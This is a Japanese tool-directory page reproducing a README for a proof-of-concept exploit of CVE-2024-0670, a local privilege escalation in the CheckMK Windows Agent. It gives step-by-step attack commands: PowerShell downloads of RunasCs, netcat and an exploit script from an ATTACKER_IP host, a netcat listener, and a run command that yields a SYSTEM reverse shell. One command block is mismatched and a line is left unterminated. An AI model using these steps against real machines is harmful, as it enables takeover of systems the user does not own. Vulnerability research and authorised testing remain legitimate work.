Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — このリポジトリには、CheckMK Agent for Windowsに影響を与えるローカル権限昇格の脆弱性であるCVE-2024-0670のエクスプロイトデモが含まれています。この脆弱性により、低特権ユーザーがMSI修復メカニズムによって処理される書き込み可能なファイルパスを悪用してSYSTEM権限を取得することが可能です。 | Kitploit
ツール/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
特権昇格ペイロード生成脆弱性分析エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

このリポジトリには、CheckMK Agent for Windowsに影響を与えるローカル権限昇格の脆弱性であるCVE-2024-0670のエクスプロイトデモが含まれています。この脆弱性により、低特権ユーザーがMSI修復メカニズムによって処理される書き込み可能なファイルパスを悪用してSYSTEM権限を取得することが可能です。

リポジトリを見る
319ヶ月前未レビュー

CVE-2024-0670 – CheckMK Agent ローカル特権昇格 (PoC)

このリポジトリには、CVE-2024-0670(CheckMK Windows Agent のローカル特権昇格の脆弱性)のシンプルでクリーンな概念実証が含まれています。 低権限のユーザーが、MSI修復中に実行される書き込み可能な一時ファイルパスを悪用することで、SYSTEM権限を取得できます。

🔍 脆弱性の概要

  • ベンダー: Tribe29
  • CVE: CVE-2024-0670
  • アドバイザリ: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

MSI修復中、CheckMK は以下の場所でファイルを実行します:

root@kitploit:~
  C:\Windows\Temp\

通常のユーザーが予測可能な名前でファイルをそこに配置できる場合、NT AUTHORITY\SYSTEM としてコマンドを実行できます。

このエクスプロイトは複数のペイロードファイル名を仕込み、MSI修復をトリガーして SYSTEM 実行を達成します。

📂 ファイル

root@kitploit:~
RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 要件

  • 低権限のWindowsユーザー
  • PowerShellが有効
  • CheckMK Windows Agentがインストールされている
  • ファイルをダウンロードできる環境
  • Python(簡易HTTPサーバー用)
  • 攻撃マシン上のNetcatリスナー

📡 HTTPサーバーの起動

root@kitploit:~
  C:\Windows\Temp\

📥 ターゲット上にツールをダウンロード

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 エクスプロイトの実行

自分のマシンでリスナーを起動:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

成功すると、SYSTEM 権限のリバースシェルが得られます。

🔧 RunasCsの手動ビルド(オプション)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ 法的免責事項

このプロジェクトは教育目的および許可されたペネトレーションテストのみを対象としています。 違法目的で使用しないでください。 作者は誤用に対する責任を負いません。

ツールをダウンロード